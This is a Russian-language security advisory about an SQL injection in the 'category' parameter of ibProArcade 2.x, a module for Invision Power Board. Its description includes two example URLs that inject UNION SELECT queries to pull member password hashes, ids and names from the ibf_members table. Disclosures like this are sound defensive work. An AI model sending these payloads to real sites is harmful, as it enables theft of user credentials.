SQL-инъекция в ibProArcade
| Дата публикации: | 23.11.2004 |
| Дата изменения: | 16.10.2006 |
| Всего просмотров: | 1450 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2004-1430 CVE-2004-1536 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Неавторизованное изменение данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | ibProArcade 2.x (модуль к Invision Power Board) |
| Уязвимые версии: ibProArcade
Описание: Уязвимость существует при обработке входных данных в поле 'category'. Удаленный атакующий может с помощью специально сформированного URL выполнить SQL-инъекцию. Примеры: http://[target]/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,p assword,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* http://[target]/index.php?act=Arcade&cat=-1% 20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/* URL производителя: www.ibproarcade.com Решение: Решение на данный момент не существует |
|
| Ссылки: | ibProArcade Input Validation Hole in 'category' Lets Remote Users Inject SQL Commands |